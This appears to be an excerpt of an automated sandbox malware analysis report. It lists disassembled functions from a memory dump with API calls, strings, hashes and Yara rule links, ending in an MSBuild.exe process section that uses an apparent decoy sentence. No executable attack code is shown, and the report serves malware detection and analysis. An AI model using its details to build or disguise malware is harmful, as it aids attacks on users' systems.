Instruction Fuzzy Hash: DC01283290D3922ED62667F77C867273744EB027B4B20432AF210650E5EF1B6C027352

Function 00FF0F50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,558E5182,?,?,00000000,01001FC8,000000FF,?,00FF0EE0,00FF1010,?,00FF0EB4,00000000), ref: 00FF0F85
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FF0F97
FreeLibrary.KERNEL32(00000000,?,?,00000000,01001FC8,000000FF,?,00FF0EE0,00FF1010,?,00FF0EB4,00000000), ref: 00FF0FB9

Strings

CorExitProcess, xrefs: 00FF0F8F
mscoree.dll, xrefs: 00FF0F7E

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c23c4b1906f3b9105c08545ecbb005ee467ee9de5e42c74c7a97987b86610234
Instruction ID: 254fe50e144d83ae228580dc777c738f0cb18bdd9b5d83fa556f821bd055903d
Opcode Fuzzy Hash: c23c4b1906f3b9105c08545ecbb005ee467ee9de5e42c74c7a97987b86610234
Instruction Fuzzy Hash: 8001A271904619EFDB23CB50DC09FBEBBB8FB04B20F040529F951A62D4DB7A9800CB90

Function 00FE4436 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FE4442
int.LIBCPMT ref: 00FE4455

Part of subcall function 00FE16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00FE16C5
Part of subcall function 00FE16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00FE16DF

std::_Facet_Register.LIBCPMT ref: 00FE4488
std::_Lockit::~_Lockit.LIBCPMT ref: 00FE449E
Concurrency::cancel_current_task.LIBCPMT ref: 00FE44A9

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 947cf838b379a7827d93b4406722f59613bc2d996b5b91599314d665bd719402
Instruction ID: 3a82a62cb5058d72df5851d8b77723da0f2fc326c2837c022da3e3b7292421f5
Opcode Fuzzy Hash: 947cf838b379a7827d93b4406722f59613bc2d996b5b91599314d665bd719402
Instruction Fuzzy Hash: E201A772A00294ABCB25EB56DC059AE7768EF80770B24015DFD05972D0DF38BE41E794

Function 00FE3DB1 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FE3DBD
int.LIBCPMT ref: 00FE3DD0

Part of subcall function 00FE16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00FE16C5
Part of subcall function 00FE16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00FE16DF

std::_Facet_Register.LIBCPMT ref: 00FE3E03
std::_Lockit::~_Lockit.LIBCPMT ref: 00FE3E19
Concurrency::cancel_current_task.LIBCPMT ref: 00FE3E24

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 641a6209a70bec8a95cd148231261522266a87e19a73ea34dcb9b6b308b47a4a
Instruction ID: fce565eac466b7dc3b09837be5c7d19dfbb60452cd43ea27b2cff13ff054c2e1
Opcode Fuzzy Hash: 641a6209a70bec8a95cd148231261522266a87e19a73ea34dcb9b6b308b47a4a
Instruction Fuzzy Hash: 5F01A272900298ABCB35AF66DC498AE7769EF80764B240149F80197291DF39BE01EB80

Function 00FE4308 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FE4315
int.LIBCPMT ref: 00FE4328

Part of subcall function 00FE16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00FE16C5
Part of subcall function 00FE16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00FE16DF

std::_Facet_Register.LIBCPMT ref: 00FE435B
std::_Lockit::~_Lockit.LIBCPMT ref: 00FE4371
Concurrency::cancel_current_task.LIBCPMT ref: 00FE437C

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 11d97bcf336e9f985b748f3a58362bd24e3583a8fe4a5545bf8c8385e9324d53
Instruction ID: 2c49d4c7a5dddea8f4f108b602d3e1c63e6b7bc34e84bd196181e4a0365ca9cb
Opcode Fuzzy Hash: 11d97bcf336e9f985b748f3a58362bd24e3583a8fe4a5545bf8c8385e9324d53
Instruction Fuzzy Hash: 4701D632900598ABCB25FF66DC058DE7769AF84760B14019DF805A7291EF38BE05FBC4

Function 00FE507A Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00FE5081
std::_Lockit::_Lockit.LIBCPMT ref: 00FE508C
std::locale::_Setgloballocale.LIBCPMT ref: 00FE50A7
_Yarn.LIBCPMT ref: 00FE50BD
std::_Lockit::~_Lockit.LIBCPMT ref: 00FE50FA

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_SetgloballocaleYarnstd::locale::_
String ID:
API String ID: 156189095-0
Opcode ID: 29dd648adc0cec95381419d6848f23308ad73b2fac0c9081a52793a924018bc2
Instruction ID: e5d88424d4976bf9ecc7c8202263037ddf359758beff068ac90f956c82a01c98
Opcode Fuzzy Hash: 29dd648adc0cec95381419d6848f23308ad73b2fac0c9081a52793a924018bc2
Instruction Fuzzy Hash: 6801BC31A006A18BD716AB21DC45A7D7762BF88750B54400DE9811B381CF3DBE02EBC5

Function 0102961A Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 01029626

Part of subcall function 01028E77: __getptd_noexit.LIBCMT ref: 01028E7A
Part of subcall function 01028E77: __amsg_exit.LIBCMT ref: 01028E87

__getptd.LIBCMT ref: 0102963D
__amsg_exit.LIBCMT ref: 0102964B
__lock.LIBCMT ref: 0102965B
__updatetlocinfoEx_nolock.LIBCMT ref: 0102966F

Memory Dump Source

Source File: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
Instruction ID: 4384dadb4ee0a08b65528ecf3ce69fcb3bd7b10e01312d15c0d4c9a27d452338
Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
Instruction Fuzzy Hash: 09F0B432A047329BDB71BB689806B9D37D0AF24728F95414AD4D4A62D1CF245940CB5A

Function 00FEB3A2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00FEB353,00000000,?,0105B6DC,?,?,?,00FEB4F6,00000004,InitializeCriticalSectionEx,01004BD8,InitializeCriticalSectionEx), ref: 00FEB3AF
GetLastError.KERNEL32(?,00FEB353,00000000,?,0105B6DC,?,?,?,00FEB4F6,00000004,InitializeCriticalSectionEx,01004BD8,InitializeCriticalSectionEx,00000000,?,00FEB2AD), ref: 00FEB3B9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00FEB3E1

Strings

api-ms-, xrefs: 00FEB3C6

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: cfa97ffa755bb10de85fdddf7e5999f8fbe2ffa62a76b599b312737f70b2491b
Instruction ID: 5aa57375bbe4f435d8b52f341b4f9b819ae583e1c0328a0e37676e00b403595d
Opcode Fuzzy Hash: cfa97ffa755bb10de85fdddf7e5999f8fbe2ffa62a76b599b312737f70b2491b
Instruction Fuzzy Hash: 8CE09230645344BFEA225B72EC46B593E55AB00B51F104022FA4DE80D5D76699519694

Function 00FF7747 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(558E5182,00000000,00000000,00000000), ref: 00FF77AA

Part of subcall function 00FF952A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00FF8FD3,?,00000000,-00000008), ref: 00FF95D6

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FF7A05
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FF7A4D
GetLastError.KERNEL32 ref: 00FF7AF0

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 543a638f01c141b58dfee58f9d0c3af54597fd6384a66c84ebc9016c20a6b680
Instruction ID: 71e346f5fbb1daf84bf38dc2ff510da38017bf3fccfa009fc9a84bde20f0a061
Opcode Fuzzy Hash: 543a638f01c141b58dfee58f9d0c3af54597fd6384a66c84ebc9016c20a6b680
Instruction Fuzzy Hash: 69D18875D042889FCB11DFA8C880AEDFBB5FF08310F28416AE965EB361D774A902DB50

Function 00FEA371 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00FEA438
___AdjustPointer.LIBCMT ref: 00FEA45B
___AdjustPointer.LIBCMT ref: 00FEA4F7

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: e28b70c9eb6b5a005069a224490a0dd1eaa8c6782052a8690765c9d482b92f9d
Instruction ID: d14ebe8da276cd62189cd90aee429d64ee71e0ce9437e364736d114285e067c8
Opcode Fuzzy Hash: e28b70c9eb6b5a005069a224490a0dd1eaa8c6782052a8690765c9d482b92f9d
Instruction Fuzzy Hash: B051F172A003869FEB25DF56D845B7AB7A4EF40320F24442DE815872E1E775BD40EB92

Function 010006EF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00FFF713,00000000,00000001,00000000,00000000,?,00FF7B44,00000000,00000000,00000000), ref: 01000706
GetLastError.KERNEL32(?,00FFF713,00000000,00000001,00000000,00000000,?,00FF7B44,00000000,00000000,00000000,00000000,00000000,?,00FF80CB,00000000), ref: 01000712

Part of subcall function 010006D8: CloseHandle.KERNEL32(FFFFFFFE,01000722,?,00FFF713,00000000,00000001,00000000,00000000,?,00FF7B44,00000000,00000000,00000000,00000000,00000000), ref: 010006E8

___initconout.LIBCMT ref: 01000722

Part of subcall function 0100069A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,010006C9,00FFF700,00000000,?,00FF7B44,00000000,00000000,00000000,00000000), ref: 010006AD

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00FFF713,00000000,00000001,00000000,00000000,?,00FF7B44,00000000,00000000,00000000,00000000), ref: 01000737

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: c8a11a01020ace48e40a3042166bc5c19451df964fd6674217e3503fdcb126f6
Instruction ID: 1cc925762de017449d4bf919a9a8416c02d5729a2aa80c6d4cb3e311e7e4c571
Opcode Fuzzy Hash: c8a11a01020ace48e40a3042166bc5c19451df964fd6674217e3503fdcb126f6
Instruction Fuzzy Hash: 35F01C36900155BFDF631FD5DC08ACA3FA6FB4D2E1F004051FA9D95164CA368920EF90

Function 00FEA060 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00FEA09F
__IsNonwritableInCurrentImage.LIBCMT ref: 00FEA153

Strings

csm, xrefs: 00FEA13D

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 949af0c77d46f93cd80840bc9717aa4b98730b7e208d72fd1db7c33a19c8ea79
Instruction ID: 65c02b1ad0ae358af657b9e2d4507e46a08c06445d650b1ead155e29a37741bd
Opcode Fuzzy Hash: 949af0c77d46f93cd80840bc9717aa4b98730b7e208d72fd1db7c33a19c8ea79
Instruction Fuzzy Hash: F141D634E002899BCF11DF6ACC80A9E7BB5AF45324F148055FA149B392D739EE15DF92

Function 00FEA96D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00FEA992

Strings

RCC, xrefs: 00FEA9AC
MOC, xrefs: 00FEA9A4

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 0f5bfb600b3e68bb5fb625feeef7edad40941e10ddd0fed851b1cff39176d132
Instruction ID: 38dc95353854d24c64c485a1dbefdd0d196a9dfec822e4ea238b1f3b3ba811bf
Opcode Fuzzy Hash: 0f5bfb600b3e68bb5fb625feeef7edad40941e10ddd0fed851b1cff39176d132
Instruction Fuzzy Hash: C9418C31D00249EFCF16DF95CD81AAEBBB5FF08310F1540A9FA04A7221D339A950EB52

Function 01024FD8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0102504A
__aulldiv.LIBCMT ref: 01025058

Strings

@, xrefs: 01025025

Memory Dump Source

Source File: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: @
API String ID: 3732870572-2766056989
Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction ID: 69bf0af6ebadd628308bd1855b947aa945b80dd8b9b68c8d5894b23a1d56e8b6
Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
Instruction Fuzzy Hash: E1215CB1E44218ABDB00DFD4CC49FEEB7B9FB45B10F104209F605BB280C7B869018BA9

Function 0100E0F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0100E130
__aulldiv.LIBCMT ref: 0100E13E

Strings

@, xrefs: 0100E10B

Memory Dump Source

Source File: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: @
API String ID: 3732870572-2766056989
Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction ID: bb37f94e6c44bcba34117ffaa76180b364d873d23e71f5308ab813c74bebe7f6
Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction Fuzzy Hash: 97016DB0D44308FAEB10DBE0CC49BDDBBB8EB40B01F248448E744762C0D7B495428B59

Function 00FE15DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FE15E6
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FE161E

Part of subcall function 00FE5178: _Yarn.LIBCPMT ref: 00FE5197
Part of subcall function 00FE5178: _Yarn.LIBCPMT ref: 00FE51BB

Strings

bad locale name, xrefs: 00FE162C

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: fcf4e863e8419c131705cf42f3112011c3404ef195e6cd81afd40de1bcfa3d17
Instruction ID: 72d72a634633aeadf8b4a1e3ebe2cd295dfa0cf0662554861d41e78c6e62f603
Opcode Fuzzy Hash: fcf4e863e8419c131705cf42f3112011c3404ef195e6cd81afd40de1bcfa3d17
Instruction Fuzzy Hash: 36F03A71546B909E83319F7B8881447FBE4BE293207948E2FE0DEC3A12D734E404CB6A

Analysis Process: MSBuild.exePID: 4616, Parent PID: 6352COMMON

Execution Graph

Execution Coverage:	13.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.6%
Total number of Nodes:	1529
Total number of Limit Nodes:	3

Executed Functions

Function 004045C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
